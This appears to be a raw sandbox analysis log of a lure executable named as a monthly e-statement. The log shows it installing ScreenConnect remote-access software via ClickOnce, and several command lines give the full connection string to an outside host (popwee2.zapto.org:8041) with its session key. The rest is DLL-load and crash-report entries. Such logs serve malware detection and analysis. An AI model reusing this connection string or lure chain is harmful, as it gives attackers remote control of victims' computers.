                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User"
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
